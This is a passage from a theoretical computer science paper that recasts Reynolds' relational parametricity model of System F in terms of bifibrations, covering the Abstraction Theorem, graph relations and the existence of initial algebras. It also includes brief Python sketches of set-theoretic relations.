Each set \( A \) has an associated equality relation defined by \( \text{Eq} A = \{(a, a) \mid a \in A\} \). **Example 2.5** The functor \( U : \text{Rel} \to \text{Set} \times \text{Set} \) sending \((A, B, R)\) to \((A, B)\) is called the relations fibration on \( \text{Set} \). To see that \( U \) is indeed a fibration, let \((f, g) : (X_1, X_2) \to (Y_1, Y_2)\) be a morphism in \( \text{Set} \times \text{Set} \) with \( UR = (Y_1, Y_2) \) for some \( R \) in \( \text{Rel} \). If we define \((f, g)^* R \subseteq X_1 \times X_2 \) by \((x_1, x_2) \in (f, g)^* R \) iff \((fx_1, gx_2) \in R\), then \((f, g)\) is a cartesian morphism from \((f, g)^* R\) to \( R \) over \((f, g)\). It is also easy to see that \( U \) is an opfibration, with opreindexing given by forward image. Thus, \( U \) is a bifibration. We denote the fibre over \((A, B)\) in the relations fibration on \( \text{Set} \) by \( \text{Rel}(A, B) \). **Definition 2.6** Let \( U : \mathcal{E} \to \mathcal{B} \) and \( U' : \mathcal{E}' \to \mathcal{B}' \) be fibrations. A fibred functor \( F : U \to U' \) comprises two functors \( F_0 : \mathcal{B} \to \mathcal{B}' \) and \( F_1 : \mathcal{E} \to \mathcal{E}' \) such that \( U'F_1 = F_0U \) and cartesian morphisms are preserved, i.e., if \( f \) is cartesian in \( \mathcal{E} \) over \( g \) in \( \mathcal{B} \) then \( F_1f \) is cartesian in \( \mathcal{E}' \) over \( F_0g \) in \( \mathcal{B}' \). If \( F' : U \to U' \) is another fibred functor, then a fibred natural transformation \( \eta : F \to F' \) comprises two natural transformations \( \eta_0 : F_0 \to F'_0 \) and \( \eta_1 : F_1 \to F'_1 \) such that \( U'\eta_1 = \eta_0 U \). In this paper we use fibred functors and fibred transformations to interpret System F types and terms, and show that under mild conditions this gives parametric models. 
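Concretely, over finite sets the reindexing and opreindexing of Example 2.5 are just inverse and forward image. A minimal executable sketch (the function names and encoding are ours, not the paper's):

```python
# Relations fibration on (finite) Set: an object over (A, B) is a relation R ⊆ A×B.

def reindex(f, g, R, X1, X2):
    """(f, g)^* R: inverse image, the domain of the cartesian lifting."""
    return {(x1, x2) for x1 in X1 for x2 in X2 if (f(x1), g(x2)) in R}

def opreindex(f, g, R):
    """Sigma_{(f, g)} R: forward image, the codomain of the opcartesian lifting."""
    return {(f(x1), g(x2)) for (x1, x2) in R}
```

Fibre-wise, opreindexing is left adjoint to reindexing — $\Sigma_{(f,g)} S \subseteq R$ iff $S \subseteq (f,g)^* R$ — which mirrors the universal properties of Definition 2.1 and can be checked by brute force on small sets.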
## 3 Reynolds’ Model of Relational Parametricity

We now describe Reynolds’ set-theoretic model of relational parametricity: first concretely, and then in terms of the relations fibration $\mathrm{Rel} \to \mathrm{Set} \times \mathrm{Set}$. As Reynolds discovered, there are in fact no set-theoretic models if the meta-theory is classical logic [26], but the following makes sense in the (intuitionistic) internal language of a topos [22], or in the Calculus of Constructions with impredicative $\mathrm{Set}$. Throughout, we assume a standard syntax for System F.

### 3.1 Semantics of Types

Reynolds presents two “parallel” semantics for System F: a standard set-based semantics $[-]_o$, and a relational semantics $[-]_r$. Given $\Gamma \vdash T$ type, where the type context $\Gamma$ contains $|\Gamma| = n$ type variables, Reynolds defines interpretations $[T]_o : \mathrm{Set}^n \to \mathrm{Set}$ and $[T]_r : \mathrm{Rel}^n(A, B) \to \mathrm{Rel}([T]_o A, [T]_o B)$ by structural induction on type judgements as follows:

Type variables: $[X_i]_o A = A_i$ and $[X_i]_r R = R_i$.

Arrow types:
\[
[T_1 \to T_2]_o A = [T_1]_o A \to [T_2]_o A
\]
\[
[T_1 \to T_2]_r R = \{ (f,g) \mid (a,b) \in [T_1]_r R \Rightarrow (fa, gb) \in [T_2]_r R \}
\]

Forall types:
\[
[\forall X.T]_o A = \{ f : \textstyle\prod_{S : \mathrm{Set}} [T]_o (A,S) \mid \forall R' \in \mathrm{Rel}(A', B') .\ (fA', fB') \in [T]_r (\mathrm{Eq}\,A, R') \}
\]
\[
[\forall X.T]_r R = \{ (f,g) \mid \forall R' \in \mathrm{Rel}(A', B') .\ (fA', gB') \in [T]_r (R, R') \}
\]

The definitions of $[\forall X.T]_o$ and $[\forall X.T]_r$ depend crucially on one another. Thus, we do not really have two semantics — one based on $\mathrm{Set}$ and one based on $\mathrm{Rel}$ — but rather a single semantics based on the relations fibration $U : \mathrm{Rel} \to \mathrm{Set} \times \mathrm{Set}$.
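Over finite sets, Reynolds' arrow clause can be computed by enumeration, and one can check directly that it sends equality relations to equality relations — the arrow-type case of the Identity Extension Lemma discussed below. A self-contained sketch (the representation and names are ours):

```python
from itertools import product

def all_functions(A, B):
    """All set-theoretic functions A -> B, represented as dicts."""
    A = sorted(A)
    return [dict(zip(A, vals)) for vals in product(sorted(B), repeat=len(A))]

def eq(A):
    """The equality relation Eq A = {(a, a) | a in A}."""
    return {(a, a) for a in A}

def arrow_rel(R, S, A1, A2, B1, B2):
    """[[T1 -> T2]]_r: pairs (f, g) sending R-related arguments to S-related results."""
    return [(f, g)
            for f in all_functions(A1, B1)
            for g in all_functions(A2, B2)
            if all((f[a], g[b]) in S for (a, b) in R)]
```

For $R = \mathrm{Eq}\,A$ and $S = \mathrm{Eq}\,B$, a pair $(f, g)$ is in the resulting relation exactly when $f = g$, i.e., the clause returns the equality relation on the function space $B^A$.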
In other words, Reynolds’ definitions of $[-]_o$ and $[-]_r$ entail the following theorem:

**Theorem 3.1 (Fibrational Semantics of Types)** Let $U$ be the relations fibration on $\mathrm{Set}$. Every judgement $\Gamma \vdash T$ induces a fibred functor $[T] : |U|^{|\Gamma|} \to U$.

\[
\begin{array}{ccc}
|\mathrm{Rel}|^{|\Gamma|} & \xrightarrow{\ [T]_r\ } & \mathrm{Rel} \\
{\scriptstyle |U|^{|\Gamma|}}\downarrow & & \downarrow{\scriptstyle U} \\
|\mathrm{Set}|^{|\Gamma|} \times |\mathrm{Set}|^{|\Gamma|} & \xrightarrow{\ [T]_o \times [T]_o\ } & \mathrm{Set} \times \mathrm{Set}
\end{array}
\]

Since the domain of $[T]_r$ is a discrete category, requiring that $[T]$ is a fibred functor amounts simply to requiring that the above diagram commutes. In particular, no preservation of cartesian morphisms by $[T]_r$ is needed.

Reynolds does not give a functorial action of types on morphisms. This is reflected in the appearance of discrete categories in Theorem 3.1. As a result, Reynolds’ pointwise interpretation of function spaces is the exponential in the functor category $|U|^{|\Gamma|} \to U$ [27]. How parametricity treats the action on morphisms will become clear in Section 5.1; instead of acting on morphisms, the interpretation of types acts on graph relations induced by morphisms. For now, we simply note that the use of discrete domains does not take us out of the fibrational framework; Lemma 2.3 ensures that $[T]$ is a functor between fibrations.

The Identity Extension Lemma (IEL) is key for many applications of parametricity. It says that every relational interpretation preserves equality relations:²

**Lemma 3.2 (IEL)** If $\Gamma \vdash T$ then $[T]_r \circ \mathrm{Eq}^{|\Gamma|} = \mathrm{Eq} \circ [T]_o$. $\square$

² Reynolds’ approach also handles “identity relations” that are not equality relations, such as the information order on domains. In this paper, like many others [2,4,13,24], we only treat equality relations. In future work, we hope to give an axiomatic account of “identity relations” similar to that of Dunphy and Reddy [7].

### 3.2 Semantics of Terms

Reynolds’ main result is his Abstraction Theorem, stating that all terms send related environments to related values. Reynolds first gives set-valued and relational interpretations of term contexts $\Delta = x_1 : T_1, \ldots, x_n : T_n$ by defining $[\Delta]_o = [T_1]_o \times \cdots \times [T_n]_o$ and $[\Delta]_r = [T_1]_r \times \cdots \times [T_n]_r$. This defines a fibred functor $[\Delta] : |U|^{|\Gamma|} \to U$. Reynolds then interprets each judgement $\Gamma; \Delta \vdash t : T$ as a family of functions $[t]_o S : [\Delta]_o S \to [T]_o S$ for each environment $S \in |\mathrm{Set}|^{|\Gamma|}$. We omit the standard definition of $[t]_o$ here. Finally, Reynolds proves:

**Theorem 3.3 (Abstraction Theorem)** Let $A, B \in |\mathrm{Set}|^{|\Gamma|}$, $R \in |\mathrm{Rel}|^{|\Gamma|}(A, B)$, $a \in [\Delta]_o A$, and $b \in [\Delta]_o B$. For every term $\Gamma; \Delta \vdash t : T$, if $(a, b) \in [\Delta]_r R$, then $([t]_o A\, a, [t]_o B\, b) \in [T]_r R$. Or, more concisely, fibrationally: every judgement $\Gamma; \Delta \vdash t : T$ is interpreted as a fibred natural transformation $([t]_o, [t]_r) : [\Delta] \to [T]$.
\[
\begin{array}{ccc}
|\mathrm{Rel}|^{|\Gamma|} & \overset{[\Delta]_r}{\underset{[T]_r}{\rightrightarrows}} & \mathrm{Rel} \\
{\scriptstyle |U|^{|\Gamma|}}\downarrow & \Downarrow{\scriptstyle [t]_r} & \downarrow{\scriptstyle U} \\
|\mathrm{Set}|^{|\Gamma|} \times |\mathrm{Set}|^{|\Gamma|} & \overset{[\Delta]_o \times [\Delta]_o}{\underset{[T]_o \times [T]_o}{\rightrightarrows}} & \mathrm{Set} \times \mathrm{Set}
\end{array}
\qquad \square
\]

It is worthwhile to unpack the fibrational statement of the theorem: since the domains of the functors $[\Delta]_o$ and $[T]_o$ are discrete, the interpretation $[t]_o$ actually defines a (vacuously natural) transformation $[t]_o : [\Delta]_o \to [T]_o$. By the definition of morphisms in the category $\mathrm{Rel}$, the existence of the (again, vacuously natural) transformation $[t]_r$ over $[t]_o \times [t]_o$ is exactly the statement that if $(a, b) \in [\Delta]_r R$, then $([t]_o A\, a, [t]_o B\, b) \in [T]_r R$ — the verbose conclusion of the theorem.

Reynolds’ original formulation of the Abstraction Theorem makes it seem at first glance as though it asserts a property of $[t]_o$. Surprisingly, however, our fibrational version makes it clear that the Abstraction Theorem actually states the existence of additional algebraic structure given by $[t]_r$, and, more generally, the interpretation of terms as fibred natural transformations. Taking this point of view and exposing this heretofore hidden structure opens the way to our bifibrational generalisation of Reynolds’ model.

## 4 Bifibrational Relational Parametricity

Thus far we have only shown how to view Reynolds’ notion of parametricity in terms of the specific fibration $U : \mathrm{Rel} \to \mathrm{Set} \times \mathrm{Set}$. We now generalise this to other fibrations.
This requires that we generalise $[-]_o$ and $[-]_r$ in such a way that the IEL and the Abstraction Theorem hold, which in turn requires that we define equality functors for these other fibrations. The construction of equality functors is standard in any fibration with the necessary infrastructure [16], but we briefly describe it here for completeness. The first step is to note that the relations fibration from Example 2.5 arises from the subobject fibration over $\mathrm{Set}$ by so-called change of base (or pullback), and to generalise that construction.

**Definition 4.1** Let $U : \mathcal{E} \to \mathcal{B}$ be a fibration and suppose $\mathcal{B}$ has products. The fibration $\mathrm{Rel}(U) : \mathrm{Rel}(\mathcal{E}) \to \mathcal{B} \times \mathcal{B}$ is defined by the following change of base:

\[
\begin{array}{ccc}
\mathrm{Rel}(\mathcal{E}) & \longrightarrow & \mathcal{E} \\
{\scriptstyle \mathrm{Rel}(U)}\downarrow & & \downarrow{\scriptstyle U} \\
\mathcal{B} \times \mathcal{B} & \xrightarrow{\ \times\ } & \mathcal{B}
\end{array}
\]

We call $\mathrm{Rel}(U)$ the *relations fibration for* $U$, and call the objects of $\mathrm{Rel}(\mathcal{E})$ relations on $\mathcal{B}$, to emphasise that this construction generalises the relations fibration on $\mathrm{Set}$.

We say that a fibration $U : \mathcal{E} \to \mathcal{B}$ has *fibred terminal objects* if each fibre $\mathcal{E}_X$ of $\mathcal{E}$ has a terminal object, and if reindexing preserves these terminal objects. The map sending each object $X$ of $\mathcal{B}$ to the terminal object in $\mathcal{E}_X$ extends to a functor $K : \mathcal{B} \to \mathcal{E}$ called the *truth functor* for $U$. We can construct an *equality functor* for $\mathrm{Rel}(U)$ from the truth functor $K$ for $U$ as follows:

**Definition 4.2** Let $U : \mathcal{E} \to \mathcal{B}$ be a bifibration with fibred terminal objects. If $\mathcal{B}$ has products, then the map $X \mapsto \Sigma_{\delta_X} K X$, where $\delta_X : X \to X \times X$, extends to the equality functor $\mathrm{Eq} : \mathcal{B} \to \mathrm{Rel}(\mathcal{E})$ for $\mathrm{Rel}(U)$.

For this definition, it is enough to ask for opreindexing along diagonals $\delta_X$ only (this is what Birkedal and Møgelberg [4] do to model equality). When dealing with graph relations in Section 5.1, though, we will use all of the opfibrational structure to opreindex along arbitrary morphisms. Our definition specialises to the equality relation $\mathrm{Eq}\,A$ when instantiated to the relations fibration on $\mathrm{Set}$.

The equality functor is faithful, but not always full; a counterexample is the equality functor for the identity bifibration $\mathrm{Id} : \mathrm{Set} \to \mathrm{Set}$, which gives a model with *ad hoc*, rather than parametric, polymorphic functions. We thus assume in the rest of this paper that equality functors are full. This is reminiscent of Birkedal and Møgelberg’s [4] assumption that the fibration has *very strong equality*, i.e., that internal equality implies external equality, in the following sense: fullness says that if $(f, g, \alpha) : 1 \to \mathrm{Eq}\,Y$ (i.e., $\alpha$ shows that $f = g$ internally), then, since $1 = \mathrm{Eq}\,1_{\mathcal{B}}$, $(f, g, \alpha) = (h, h, \mathrm{Eq}\,h)$ for some $h : 1_{\mathcal{B}} \to Y$ (i.e., $f = g$ externally). We use fullness of $\mathrm{Eq}$ at several places in Section 5 below.

We now show how to interpret arrow types and forall types as fibred functors with discrete domains. We then show that a particular class of such functors forms a $\lambda 2$-fibration and thus a model of System F which is, in fact, parametric.
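Instantiated to the relations fibration on Set, Definition 4.2 reads: take the truth predicate $K X$ (the whole of $X$, the terminal object of the fibre over $X$ in the subobject fibration) and push it forward along the diagonal, recovering $\mathrm{Eq}\,X = \{(x, x) \mid x \in X\}$. A small sketch (our encoding, not the paper's):

```python
def opreindex_along(m, S):
    """Forward image of a subset S along a function m: opreindexing on subsets."""
    return {m(x) for x in S}

def eq_via_diagonal(X):
    """Eq X = Sigma_{delta_X}(K X), as in Definition 4.2."""
    truth = set(X)                         # K X: the truth predicate over X
    delta = lambda x: (x, x)               # the diagonal delta_X : X -> X x X
    return opreindex_along(delta, truth)   # its forward image is the diagonal relation
```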
### 4.1 Interpreting Arrow Types

The definition of $[T_1 \to T_2]_o$ and $[T_1 \to T_2]_r$ in Section 3.1 is derived from the cartesian closed structure of $\mathrm{Set}$ and $\mathrm{Rel}$, respectively. Moreover, the fibration $U : \mathrm{Rel} \to \mathrm{Set} \times \mathrm{Set}$ preserves the cartesian closed structure, so that $[t]_r$ is over $[t]_o \times [t]_o$ as required by the Abstraction Theorem. Generalising from this fibration, we can model arrow types “parametrically” — i.e., in a way satisfying the Abstraction Theorem — in any fibration $U : \mathcal{E} \to \mathcal{B}$ in which $\mathcal{E}$ and $\mathcal{B}$ are cartesian closed categories (CCCs) and $U$ preserves cartesian closedness.

**Definition 4.3** A fibration $U : \mathcal{E} \to \mathcal{B}$ is an arrow fibration if both $\mathcal{E}$ and $\mathcal{B}$ are CCCs, and $U$ preserves the cartesian closed structure. A relations fibration $\mathrm{Rel}(U)$ is an equality preserving arrow fibration if it is an arrow fibration and $\mathrm{Eq} : \mathcal{B} \to \mathrm{Rel}(\mathcal{E})$ preserves exponentials.

One advantage of working with well-studied mathematical structures such as fibrations is that many of their properties can be found in the literature. This helps in determining when a relations fibration is an equality preserving arrow fibration:

**Lemma 4.4** Let $U : \mathcal{E} \to \mathcal{B}$ be a bifibration with fibred terminal objects and $\mathcal{B}$ be a CCC.

(i) If $\mathrm{Eq} : \mathcal{B} \to \mathrm{Rel}(\mathcal{E})$ has a left adjoint $Q$, then $\mathrm{Eq}$ preserves exponentials iff $Q$ satisfies the Frobenius property. Such a $Q$ exists if $U : \mathcal{E} \to \mathcal{B}$ has full comprehension, $\mathrm{Eq} : \mathcal{B} \to \mathrm{Rel}(\mathcal{E})$ is full and $\mathcal{B}$ has pushouts.
(ii) If $U : \mathcal{E} \to \mathcal{B}$ is a fibred CCC and has simple products (i.e., if, for every projection $\pi_B : A \times B \to A$ in $\mathcal{B}$, the reindexing functor $\pi_B^*$ has a right adjoint and the Beck-Chevalley condition holds), then $\mathcal{E}$ is a CCC and $U$ preserves the cartesian closed structure. $\square$

Change of base preserves simple products and fibred structure, so $\mathrm{Rel}(U)$ is a fibred CCC with simple products if $U$ is. Moreover, $\mathcal{B} \times \mathcal{B}$ is a CCC if $\mathcal{B}$ is. Lemma 4.4 thus derives structure in $\mathrm{Rel}(U)$ from structure in $U$.

### 4.2 Interpreting Forall Types

We must generalise Reynolds’ definitions of $[-]_o$ and $[-]_r$ for forall types to relations fibrations in such a way that the Abstraction Theorem and IEL hold. The rules for type abstraction and type application suggest that we should interpret $\forall$ as right adjoint to weakening by a type variable. We may first try to look for such an adjoint on the base category, then another on the total category, and then try to link these adjoints. But this is the wrong idea; for the relations fibration of Example 2.5, this gives all polymorphic functions, not just the parametrically polymorphic ones. Instead, we require an adjoint for the combined fibred semantics. Let $|\mathrm{Rel}(U)|^n \to_{\mathrm{Eq}} \mathrm{Rel}(U)$ be the category whose objects are equality preserving fibred functors from $|\mathrm{Rel}(U)|^n$ to $\mathrm{Rel}(U)$ and whose morphisms are fibred natural transformations between them.
Then:

**Definition 4.5** $\mathrm{Rel}(U)$ is a $\forall$-fibration if, for every projection $\pi_n : |\mathrm{Rel}(U)|^{n+1} \to |\mathrm{Rel}(U)|^n$, the precomposition functor $(-) \circ \pi_n : (|\mathrm{Rel}(U)|^n \to_{\mathrm{Eq}} \mathrm{Rel}(U)) \to (|\mathrm{Rel}(U)|^{n+1} \to_{\mathrm{Eq}} \mathrm{Rel}(U))$ has a right adjoint $\forall_n$ and this family of adjunctions is natural in $n$. We write $\forall$ for $\forall_n$ when $n$ can be inferred.

This definition follows, e.g., Dunphy and Reddy [7] by “baking the Identity Extension Lemma into” the definition of forall types — in the sense that the very existence of $\forall$ requires that if $F$ is equality preserving then so is $\forall F$ — rather than relegating it to a result to be proved post facto. If $U$ is faithful, then Definition 4.5 can be reformulated in terms of more basic concepts using its opfibrational structure. The IEL then becomes a consequence of the definition, rather than an intrinsic part of it [9]. For the purposes of this paper, this abstract specification is enough.

### 4.3 Fibred functors with discrete domains form a parametric model

A $\lambda 2$-fibration, i.e., a fibration $p : G \to S$ with fibred finite products, finite products in $S$, fibred exponents, a generic object $\Omega$, and simple $\Omega$-products, is a categorical model of System F. Seely [29] gives a sound interpretation of the calculus in such fibrations. We conclude this section with the following theorem:

**Theorem 4.6** If $\mathrm{Rel}(U)$ is an equality preserving arrow fibration and a $\forall$-fibration, then there is a $\lambda 2$-fibration in which types $\Gamma \vdash T$ are interpreted as equality preserving fibred functors $[T] : |\mathrm{Rel}(U)|^{|\Gamma|} \to_{\mathrm{Eq}} \mathrm{Rel}(U)$ and terms $\Gamma; \Delta \vdash t : T$ are interpreted as fibred natural transformations $[t] : [\Delta] \to [T]$.
$\square$

Note that Lemma 4.4 gives conditions for $\mathrm{Rel}(U)$ to be an arrow fibration, and our other paper [9] similarly gives conditions for $\mathrm{Rel}(U)$ to be a $\forall$-fibration. Unwinding the interpretation of System F in $\lambda 2$-fibrations [29], we see that we get the following for every fibration $U : \mathcal{E} \to \mathcal{B}$ satisfying the hypotheses of the theorem: for every System F type $\Gamma \vdash T$ and term $\Gamma; \Delta \vdash t : T$, we get

(i) a standard interpretation of $\Gamma \vdash T$ as a functor $[T]_o : |\mathcal{B}|^{|\Gamma|} \to \mathcal{B}$;

(ii) a relational interpretation of $\Gamma \vdash T$ as a functor $[T]_r : |\mathrm{Rel}(\mathcal{E})|^{|\Gamma|} \to \mathrm{Rel}(\mathcal{E})$;

(iii) a proof of the Identity Extension Lemma in the form of Lemma 3.2, i.e., a proof that $[T]$ is equality preserving;

(iv) a standard interpretation of $\Gamma; \Delta \vdash t : T$ as a natural transformation $[t]_o : [\Delta]_o \to [T]_o$; and

(v) a proof of the Abstraction Theorem in the form of Theorem 3.3, i.e., a proof that $\Gamma; \Delta \vdash t : T$ has a relational interpretation as a natural transformation $[t]_r : [\Delta]_r \to [T]_r$ over $[t]_o \times [t]_o$.

Theorem 4.6 also gives a powerful internal language [16], where base types in type context $\Gamma$ are given by fibred functors $|\mathrm{Rel}(U)|^{|\Gamma|} \to_{\mathrm{Eq}} \mathrm{Rel}(U)$, and base term constants in term context $\Delta$ are given by fibred natural transformations $[\Delta] \to [T]$. Thus, we can use this language to reason about our models using System F. This will be used in the proofs of Theorems 5.7 and 5.11 below.

## 5 Consequences of parametricity

We use our new framework to derive expected consequences of parametricity. This serves as a “sanity check” for our new bifibrational conceptualisation, and shows that our framework is powerful enough to derive the same results as, e.g., Birkedal and Møgelberg [4].
At a high level, our proof strategies are often similar to the ones found in the literature, while the proofs of individual facts are necessarily specific to our setting, and often fibrational in nature. 5.1 Graph Relations In the fibration $U : \text{Rel} \to \text{Set} \times \text{Set}$ every function $f : X \to Y$ defines a graph relation $\langle f \rangle = \{(x,y) \mid fx = y\} \subseteq X \times Y$. This generalises to the fibrational setting, where the graph of $f : A \to B$ is obtained by reindexing the equality relation on $B$. Definition 5.1 Let $U : \mathcal{E} \to \mathcal{B}$ be a fibration with fibred terminal objects and products in $\mathcal{B}$. The graph of $h : X \to Y$ in $\mathcal{B}$ is $\langle h \rangle = (h, \text{id}_Y)^{\ast} (\text{Eq}\, Y)$ in $\text{Rel}(\mathcal{E})$. The definition of $\langle h \rangle$ agrees with the set-theoretic one for the set-relations fibration on $\text{Set}$. Since reindexing preserves identities, $\langle \text{id}_A \rangle = (\text{id}_A, \text{id}_A)^{\ast} (\text{Eq}\, A) = \text{Eq}\, A$ for any object $A$ of $\mathcal{B}$. In a bifibration, we can also define the graph of $f : A \to B$ in another, isomorphic way by using opfibrational structure to opreindex equality on $A$. Lemma 5.2 (Lawvere [17]) If $U : \mathcal{E} \to \mathcal{B}$ is a bifibration with fibred terminal objects that satisfies the Beck-Chevalley condition [16, Section 1.8.11], and if $\mathcal{B}$ has products, then the graph of $h : X \to Y$ can also be described by $\langle h \rangle = \Sigma_{(\text{id}_X, h)} (\text{Eq}\, X)$. □ Being able to describe graph relations in terms of either reindexing or opreindexing in any bifibration lets us use the universal properties of both when proving theorems about them. Graph relations are the key structures that turn morphisms in $\mathcal{B}$ into objects in $\text{Rel}(\mathcal{E})$ and, more generally, mediate the standard and relational semantics.
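In the set-relations case, the reindexing description of graphs in Definition 5.1 and the opreindexing description of Lemma 5.2 can be sketched concretely (an illustrative sketch of the set-theoretic instance only; the function names are ours):

```python
# Sketch of graph relations in the set-relations fibration.
def eq(xs):
    # Eq X = {(x, x) | x in X}, the equality relation on a set
    return {(x, x) for x in xs}

def reindex(g, h, rel):
    # (g, h)^* R = {(a, b) | (g(a), h(b)) in R}  (pullback of a relation)
    return lambda dom_a, dom_b: {(a, b) for a in dom_a for b in dom_b
                                 if (g(a), h(b)) in rel}

def graph(f, dom, cod):
    # <f> = (f, id)^* (Eq cod), as in Definition 5.1 (set case)
    return reindex(f, lambda y: y, eq(cod))(dom, cod)

def opreindex(g, h, rel):
    # Sigma_(g, h) R = {(g(a), h(b)) | (a, b) in R}  (direct image)
    return {(g(a), h(b)) for (a, b) in rel}

X, Y = {0, 1, 2}, {0, 1, 2, 3, 4}
double = lambda x: 2 * x
assert graph(double, X, Y) == {(0, 0), (1, 2), (2, 4)}
assert graph(lambda x: x, X, X) == eq(X)                 # <id> = Eq
# Lemma 5.2 in the set case: Sigma_(id, h)(Eq X) is the same relation
assert opreindex(lambda x: x, double, eq(X)) == graph(double, X, Y)
```

Both descriptions compute the same relation, which is the point of Lemma 5.2: either universal property can be used when reasoning about graphs.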
The graph functor for $\text{Rel}(U) : \text{Rel}(\mathcal{E}) \to \mathcal{B} \times \mathcal{B}$ is the functor $\langle \_ \rangle : \mathcal{B}^{\to} \to \text{Rel}(\mathcal{E})$ mapping $f : X \to Y$ in $\mathcal{B}$ to $\langle f \rangle$ in $\text{Rel}(\mathcal{E})$. To see how $\langle \_ \rangle$ acts on morphisms, recall that if $f : X \to Y$ and $f' : X' \to Y'$ are objects of the arrow category $\mathcal{B}^{\to}$, then a morphism from $f$ to $f'$ is a pair of morphisms $g : X \to X'$ and $h : Y \to Y'$ such that $f' \circ g = h \circ f$. The universal property of reindexing in $\text{Rel}(U)$ guarantees the existence of a unique morphism $\langle g, h \rangle : \langle f \rangle \to \langle f' \rangle$ over $(g, h)$ such that the following square commutes, where the horizontal morphisms are the cartesian morphisms over $(f, \text{id}_Y)$ and $(f', \text{id}_{Y'})$: \[ \begin{array}{ccc} \langle f \rangle & \longrightarrow & \text{Eq}\, Y \\ \exists ! \langle g, h \rangle \big\downarrow & & \big\downarrow \text{Eq}\, h \\ \langle f' \rangle & \longrightarrow & \text{Eq}\, Y' \end{array} \] Lemma 5.3 If the underlying bifibration satisfies the Beck-Chevalley condition, then $\langle \_ \rangle : \mathcal{B}^{\to} \to \text{Rel}(\mathcal{E})$ is full and faithful if $\text{Eq} : \mathcal{B} \to \text{Rel}(\mathcal{E})$ is. □ The proof uses the opfibrational characterisation of the graph functor from Lemma 5.2. The main tool for deriving consequences of parametricity is the Graph Lemma, which relates the graph of the action of a functor on a morphism with its relational action on the graph of the morphism. Interestingly, although our setting is possibly proof-relevant (i.e., there can be multiple proofs that two elements are related), the following “logical equivalence” version of the Graph Lemma is strong enough for our applications.
If $U : \mathcal{E} \to \mathcal{B}$ and $U' : \mathcal{E}' \to \mathcal{B}'$ are fibrations, we write $(F_o, F_r) : \text{Rel}(U) \to_{\text{Eq}} \text{Rel}(U')$ to indicate that functors (not necessarily fibred) $F_o : \mathcal{B} \to \mathcal{B}'$ and $F_r : \text{Rel}(\mathcal{E}) \to \text{Rel}(\mathcal{E}')$ are such that $\text{Rel}(U') \circ F_r = (F_o \times F_o) \circ \text{Rel}(U)$, and $(F_o, F_r)$ is equality preserving, i.e., $F_r \circ \text{Eq} = \text{Eq} \circ F_o$. Theorem 5.4 (Graph Lemma) Assume the underlying bifibration satisfies the Beck-Chevalley condition, and let $(F_o, F_r) : \text{Rel}(U) \to_{\text{Eq}} \text{Rel}(U)$. For any $h : X \to Y$ in $\mathcal{B}$, there are vertical morphisms $\phi_h : \langle F_o h \rangle \to F_r \langle h \rangle$ and $\psi_h : F_r \langle h \rangle \to \langle F_o h \rangle$ in $\text{Rel}(\mathcal{E})$. Our proof of the Graph Lemma is completely independent of the specific functor $(F_o, F_r)$, and so in particular does not proceed by induction on the structure of types. This is a key reason why we can go beyond Dunphy and Reddy [7] and prove the existence of initial algebras of positive, rather than just strictly positive, type expressions. 5.2 Existence of Initial Algebras Let $F : C \to C$ be an endofunctor. An $F$-algebra is a pair $(A, k_A)$ with $A$ an object of $C$ and $k_A : FA \to A$ a morphism. We call $A$ the carrier of the $F$-algebra and $k_A$ its structure map. A morphism $h : A \to B$ in $C$ is an $F$-algebra homomorphism $h : (A, k_A) \to (B, k_B)$ if $k_B \circ (F h) = h \circ k_A$. An $F$-algebra $(Z, in)$ is weakly initial if, for any $F$-algebra $(A, k_A)$, there exists a mediating $F$-algebra homomorphism $\text{fold}[A, k_A] : (Z, in) \to (A, k_A)$. It is an initial $F$-algebra if $\text{fold}[A, k_A]$ is unique. The literature contains other proofs that initial algebras exist in parametric models (e.g., [4,24]). Closest to our setting is Dunphy and Reddy [7], who show that strictly positive types have initial algebras.
Under assumptions no stronger than theirs, we sharpen this result to all positive types, or, more generally, all functors on our parametric models that are strong (see below) and equality preserving. Let $F = (F_o, F_r) : \text{Rel}(U) \to_{\text{Eq}} \text{Rel}(U)$ be a functor (note that the domain of $F$ is not discrete and that $F$ need not preserve cartesian morphisms) with a strength $t = (t_o, t_r)$, i.e., a family of morphisms $(t_o)_{A,B} : (A \Rightarrow B) \to (F_oA \Rightarrow F_oB)$ and $(t_r)_{R,S} : (R \Rightarrow S) \to (F_rR \Rightarrow F_rS)$ with $(t_r)_{R,S}$ over $((t_o)_{A,B}, (t_o)_{C,D})$ if $R$ is over $(A, B)$ and $S$ is over $(C, D)$, such that $t$ preserves identity and composition. A functor with a strength is said to be strong. Because of the discrete domains, $t$ is a natural transformation from $\_ \Rightarrow \_$ to $F\_ \Rightarrow F\_$ in $|\text{Rel}(U)|^2 \to_{\text{Eq}} \text{Rel}(U)$, and thus $\Lambda \alpha, \beta.\ (\alpha \Rightarrow \beta) \to (F[\alpha] \Rightarrow F[\beta])$ represents the action of $F$ on morphisms in the internal language. All type expressions with one free type variable occurring only positively give rise to strong functors, but there are further examples of such functors, for instance if the model contains non-System F type constructions with natural functorial (and relational) interpretations — for example, those of dependent types in $\text{Set}$. We will show that an initial $F_o$-algebra exists. For this, we first construct a weakly initial $F_o$-algebra, which can be done in any $\lambda 2$-fibration. Using the internal language, we define $Z$ by $(Z_o, Z_r) = [\forall X. (F X \to X) \to X]$. Lemma 5.5 $Z_o$ is the carrier of a weakly initial $F_o$-algebra $(Z_o, in_o)$ with mediating morphism $\text{fold}_o[A, k]$ and $Z_r$ is the carrier of a weakly initial $F_r$-algebra $(Z_r, in_r)$ with mediating morphism $\text{fold}_r[A, k]$.
\hfill $\Box$ To show that $\text{fold}_o$ is unique, we use the graph relations from Section 5.1. Recall that a category with a terminal object $1$ is well-pointed if, for any $f, g : A \to B$, we have $f = g$ iff $f \circ e = g \circ e$ for all $e : 1 \to A$. Like Dunphy and Reddy [7], we only consider well-pointed base categories; well-pointedness is used to convert internal language reasoning in non-empty contexts to closed contexts, so that we can apply semantic techniques such as Theorem 5.4. Lemma 5.6 Assume that the underlying bifibration satisfies the Beck-Chevalley condition, and that $\text{Eq}$ is full. (i) If $B$ is well-pointed, then $\text{fold}_o[Z_o, in_o] = \text{id}_{Z_o}$. (ii) For every $F_o$-algebra homomorphism $h : (Z_o, in_o) \to (A, k_A)$, we have that $h \circ \text{fold}_o[Z_o, in_o] = \text{fold}_o[A, k_A]$. The proofs of the two parts of Lemma 5.6 are similar: both use the graph functor to map commuting diagrams in $B$ to morphisms in $\text{Rel}(E)$, and then use the Graph Lemma to see that these morphisms are $F_r$-algebras. Lemma 5.5 and Lemma 5.6 together now immediately imply the main result. **Theorem 5.7** If the underlying bifibration satisfies 